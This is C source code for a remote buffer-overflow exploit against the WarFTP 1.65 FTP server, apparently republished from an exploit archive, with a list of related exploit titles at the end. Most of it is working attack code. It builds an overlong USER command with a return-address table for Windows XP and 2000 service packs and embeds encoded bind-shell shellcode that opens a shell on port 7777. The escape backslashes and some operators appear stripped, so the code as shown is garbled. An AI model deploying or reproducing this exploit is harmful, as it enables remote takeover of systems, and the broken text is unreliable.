#include <stdio.h>

#include <string.h>

#include <winsock.h> #define VULNSERVER "WAR-FTPD 1.65"

#define VULNCMD "x55x53x45x52x20"

#define ZERO 'x00'

#define NOP 'x90'

#define VULNBUFF 485

#define BUFFREAD 128

#define PORT 21

#define LENJMPESP 4 /* #############################################################################

##### #####

##### WARFTP - VERSION 1.65 #####

##### #####

##### WarFTP Username Stack-Based Buffer-Overflow Vulnerability #####

##### #####

##### DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow #####

##### vulnerability because it fails to properly check boundaries #####

##### on user-supplied data before copying it to an insufficiently #####

##### sized buffer. #####

##### #####

##### FUNC VULNERABLE: sprintf(char *buffer, const char *format, argv) #####

##### 0x004044E7: sprintf(0x00ACFB50, "%sCRLF", ExploitBuffer) #####

##### #####

##### AFFECTED VERSION: 1.65 #####

##### USE: warftphack.exe IP_ADDRESS SO_&_SERVICE_PACK [ ESP ADDRESS ] #####

##### SO_&_SERVICE_PACK: #####

##### [0] Microsoft Windows XP Pro Spanish SP0 #####

##### [1] Microsoft Windows XP Pro Spanish SP1 #####

##### [2] Microsoft Windows XP Pro Spanish SP2 #####

##### [3] Microsoft Windows XP Pro English SP0 #####

##### [4] Microsoft Windows XP Pro English SP1 #####

##### [5] Microsoft Windows XP Pro English SP2 #####

##### [6] Microsoft Windows 2000 Pro Spanish SP0 #####

##### [7] Microsoft Windows 2000 Pro Spanish SP1 #####

##### [8] Microsoft Windows 2000 Pro Spanish SP2 #####

##### [9] Microsoft Windows 2000 Pro Spanish SP3 #####

##### [10] Microsoft Windows 2000 Pro English SP0 #####

##### [11] Microsoft Windows 2000 Pro English SP1 #####

##### [12] Microsoft Windows 2000 Pro English SP2 #####

##### [13] Microsoft Windows 2000 Pro English SP3 #####

##### [14] Custom -> JMP ESP ADDRESS #####

##### #####

##### EXAMPLE: warftphack.exe 127.0.0.1 2 #####

##### EXAMPLE2: warftphack.exe 127.0.0.1 14 0x776EDDFF #####

##### #####

##### AUTOR: niXel - SYSCODE (SPAIN) #####

##### IDE: Dev-C ver-4.9.9.2 #####

##### COMPILER: MinGW #####

##### DEPENDENCES: Linker -> libwsock32.a #####

##### MAIL: Und3rground2002@hotmail.com #####

##### #####

############################################################################# CAUTION: USER command vulnerable => no send x40 (@) char into shellcode (user@host)

no send x0A (n) char into shellcode

no send x0D (r) char into shellcode

FUNCTION sprintf => no send x00 () char into shellcode ############################ BINDSHELLCODE ##############################

[7777] */

char syscode[] =

"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"

"x49x49x49x37x49x49x49x49x49x49x49x49x51x5ax6ax61"

"x58x30x42x31x50x42x41x6bx41x41x71x32x41x42x41x32"

"x42x41x30x42x41x58x38x41x42x50x75x6dx39x4bx4cx32"

"x4ax5ax4bx50x4dx6dx38x6bx49x49x6fx59x6fx39x6fx35"

"x30x6cx4bx70x6cx65x74x37x54x4cx4bx42x65x47x4cx6e"

"x6bx31x6cx46x65x33x48x43x31x48x6fx6cx4bx70x4fx65"

"x48x6cx4bx73x6fx35x70x37x71x38x6bx31x59x4cx4bx46"

"x54x6ex6bx53x31x58x6ex30x31x6fx30x4fx69x4ex4cx4b"

"x34x49x50x41x64x46x67x49x51x7ax6ax46x6dx43x31x48"

"x42x5ax4bx38x74x47x4bx30x54x64x64x51x38x42x55x4b"

"x55x4ex6bx53x6fx51x34x43x31x4ax4bx50x66x4ex6bx46"

"x6cx42x6bx4cx4bx73x6fx75x4cx33x31x5ax4bx65x53x34"

"x6cx6ex6bx6dx59x30x6cx57x54x55x4cx55x31x4bx73x74"

"x71x69x4bx65x34x6ex6bx43x73x74x70x6cx4bx67x30x46"

"x6cx6cx4bx70x70x67x6cx6ex4dx6cx4bx57x30x44x48x71"

"x4ex72x48x4ex6ex50x4ex54x4ex38x6cx70x50x4bx4fx4e"

"x36x71x76x41x43x31x76x31x78x76x53x30x32x53x58x30"

"x77x44x33x57x42x63x6fx70x54x6bx4fx48x50x73x58x58"

"x4bx58x6dx6bx4cx57x4bx70x50x6bx4fx6ax76x71x4fx6d"

"x59x4bx55x65x36x6cx41x68x6dx53x38x63x32x42x75x51"

"x7ax36x62x59x6fx58x50x71x78x4ax79x34x49x4bx45x6e"

"x4dx30x57x69x6fx4ex36x52x73x41x43x62x73x76x33x51"

"x43x70x43x43x63x73x73x36x33x6bx4fx4ax70x75x36x41"

"x78x75x4ex71x71x35x36x42x73x4bx39x79x71x6cx55x70"

"x68x4fx54x75x4ax32x50x39x57x52x77x69x6fx38x56x70"

"x6ax72x30x50x51x53x65x4bx4fx58x50x55x38x6cx64x4c"

"x6dx34x6ex49x79x66x37x6bx4fx4ex36x50x53x30x55x69"

"x6fx4ax70x53x58x7ax45x41x59x4ex66x37x39x36x37x69"

"x6fx59x46x72x70x50x54x31x44x33x65x4bx4fx5ax70x4f"

"x63x51x78x38x67x50x79x38x46x43x49x32x77x4bx4fx4b"

"x66x62x75x79x6fx6ax70x45x36x30x6ax52x44x30x66x41"

"x78x32x43x72x4dx6fx79x6dx35x62x4ax42x70x70x59x74"

"x69x5ax6cx6cx49x6bx57x41x7ax32x64x6bx39x68x62x30"

"x31x6fx30x6bx43x6ex4ax6bx4ex51x52x34x6dx49x6ex62"

"x62x36x4cx5ax33x6cx4dx71x6ax65x68x6ex4bx4cx6bx4e"

"x4bx55x38x30x72x59x6ex4cx73x37x66x4bx4fx30x75x63"

"x74x39x6fx6ex36x33x6bx36x37x72x72x31x41x31x41x46"

"x31x50x6ax55x51x31x41x41x41x32x75x42x71x39x6fx48"

"x50x50x68x6cx6dx39x49x45x55x78x4ex30x53x39x6fx6b"

"x66x62x4ax79x6fx39x6fx47x47x39x6fx58x50x4ex6bx50"

"x57x4bx4cx6cx43x4bx74x70x64x6bx4fx6ax76x41x42x49"

"x6fx58x50x30x68x68x6fx6ax6ex4bx50x31x70x42x73x49"

"x6fx58x56x49x6fx78x50x61";

int main(int argc, char ** argv) {

char buffRead[BUFFREAD], jmpESP[LENJMPESP], ch, ch2;

char * pbuffSend;

unsigned int err = 0, i, k;

int sockData, j;

struct sockaddr_in their_addr;

WSADATA wsaData; system("cls");

fprintf(stdout, "ntWarFTP Username Stack-Based Buffer-Overflow Vulnerabilityn");

fprintf(stdout, " ____________________________________________________________________nn");

if (((argc == 3) && (atoi(argv[2]) >= 0) && (atoi(argv[2]) < 14)) || ((argc == 4) && (atoi(argv[2]) == 14))) {

if (WSAStartup(MAKEWORD(2, 0), &wsaData) == 0) {

if ((sockData = socket(AF_INET, SOCK_STREAM, 0)) != -1) {

/* Server data struct */ their_addr.sin_family = AF_INET; // ; Family AF_INET

their_addr.sin_addr.s_addr = inet_addr(argv[1]); // ; IP Address = Argv[1]

their_addr.sin_port = htons(PORT); // ; Port = 21

memset(&(their_addr.sin_zero), '0', 8); // ; IP:Port = Argv[1]:21

if (connect(sockData, (struct sockaddr *) &their_addr, sizeof(struct sockaddr)) != -1) {

recv(sockData, buffRead, BUFFREAD, 0);

buffRead[BUFFREAD - 1] = ZERO;

if (strstr(buffRead, VULNSERVER) != NULL) {

/* #################################################################################

##### BufferSend -> "USER A*VULNBUFF @JMP_ESP x90x90x90x90 SYSCODE rn #####

################################################################################# */

pbuffSend = (char *) malloc(strlen(VULNCMD) VULNBUFF LENJMPESP (sizeof(char) * 4) strlen(syscode) (sizeof(char) * 2));

if (pbuffSend != NULL) {

for (i=0; i < strlen(VULNCMD); i ) *(pbuffSend i) = VULNCMD;

for (j=0; j < VULNBUFF; i , j ) *(pbuffSend i) = 'x41';

/* - OPcodes from ntdll.dll -> JMP ESP - */

switch(atoi(argv[2])) {

case 0: memcpy(jmpESP, "xE3x39xF4x77", LENJMPESP); break;

case 1: memcpy(jmpESP, "x0Fx98xF8x77", LENJMPESP); break;

case 2: memcpy(jmpESP, "xEDx1Ex95x7C", LENJMPESP); break;

case 3: memcpy(jmpESP, "xE3x39xF4x77", LENJMPESP); break;

case 4: memcpy(jmpESP, "xCCx59xFAx77", LENJMPESP); break;

case 5: memcpy(jmpESP, "xEDx1Ex95x7C", LENJMPESP); break;

case 6: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;

case 7: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;

case 8: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;

case 9: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;

case 10: memcpy(jmpESP, "x8Bx94xF8x77", LENJMPESP); break;

case 11: memcpy(jmpESP, "xABx67xF9x77", LENJMPESP); break;

case 12: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;

case 13: memcpy(jmpESP, "xFFxFFxFFxFF", LENJMPESP); break;

case 14:

k = 0;

if ((strncmp(argv[3], "0x", (sizeof(char) * 2)) == 0) && (strlen(argv[3]) == 10)) {

for (j=(sizeof(char) * 8) - 1; ((j >= 0) && (!err)); j--) {

ch = *(argv[3] j 2);

if (((ch > 47) && (ch < 58)) || ((ch > 64) && (ch < 71)) || ((ch > 96) && (ch < 103))) {

if ((ch > 47) && (ch < 58)) ch -= 48;

else if ((ch > 64) && (ch < 71)) ch -= 55;

else ch -= 87;

if ((j % 2) == 0) jmpESP[k ] = ((ch <<= 4) | ch2);

else ch2 = ch;

}

else { fprintf(stderr, "t[ ERROR ] Three parameter syntax errornt[ ERROR ] Example: 0xFFFFFFFFn"); err = 1; }

}

}

else { fprintf(stderr, "t[ ERROR ] Three parameter syntax errornt[ ERROR ] Example: 0xFFFFFFFFn"); err = 1; }

}

if (!err) {

for (j=0; j < LENJMPESP; i , j ) *(pbuffSend i) = jmpESP[j];

for (j=0; j < (sizeof(char) * 4); i , j ) *(pbuffSend i) = NOP;

for (j=0; j < strlen(syscode); i , j ) *(pbuffSend i) = syscode[j];

memcpy(pbuffSend i, "rn", (sizeof(char) * 2));

if (i == send(sockData, pbuffSend, i, 0)) {

fprintf(stdout, "t[ OK ] Exploit buffer send to %s:%dn", argv[1], PORT);

fprintf(stdout, "t[ OK ] If you have not chosen a correct operating system andnt service pack you can cause a D.O.Sn");

fprintf(stdout, "t[ OK ] Connect: telnet %s 7777n", argv[1]);

}

else fprintf(stderr, "t[ ERROR ] No sending all exploit buffern");

}

free(pbuffSend);

}

else fprintf(stderr, "t[ ERROR ] No allocate memoryn");

}

else fprintf(stderr, "t[ ERROR ] Not a vulnerable servern");

}

else fprintf(stderr, "t[ ERROR ] Connect to %s:%dn", argv[1], PORT);

closesocket(sockData);

}

else fprintf(stderr, "t[ ERROR ] Create local socketn");

WSACleanup();

}

else fprintf(stderr, "t[ ERROR ] Load library");

}

else {

fprintf(stderr, " [ ] USE: %s IP_ADDRESS SERVICE_PACK [ ESP_ADDRESS ]nn", argv[0]);

fprintf(stderr, " [ ] SERVICE PACK: [ - ] Microsoft Windows XP Pro Spanish SP0 (0)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows XP Pro Spanish SP1 (1)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows XP Pro Spanish SP2 (2)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows XP Pro English SP0 (3)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows XP Pro English SP1 (4)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows XP Pro English SP2 (5)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro Spanish SP0 (6)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro Spanish SP1 (7)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro Spanish SP2 (8)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro Spanish SP3 (9)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro English SP0 (10)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro English SP1 (11)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro English SP2 (12)n");

fprintf(stderr, "ttt[ - ] Microsoft Windows 2000 Pro English SP3 (13)n");

fprintf(stderr, "ttt[ - ] Custom Service Pack - JMP %%ESP (14)nn");

fprintf(stderr, " [ ] EXAMPLE: %s 127.0.0.1 2n", argv[0]);

fprintf(stderr, " [ ] EXAMPLE2: %s 127.0.0.1 14 0x776EDDFFn", argv[0]);

}

fprintf(stdout, " ___________________________________________________________________nn");

return 0;

}

【WarFTP 1.65 (USER) Remote Buffer Overlow Exploit】相关文章：

★ Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

★ Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

★ FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

★ Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

★ Ultra Office ActiveX Control Remote Buffer Overflow Exploit

★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

★ Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit

★ LoveCMS 1.6.2 Final Update Settings Remote Exploit

★ LoveCMS 1.6.2 Final Remote Code Execution Exploit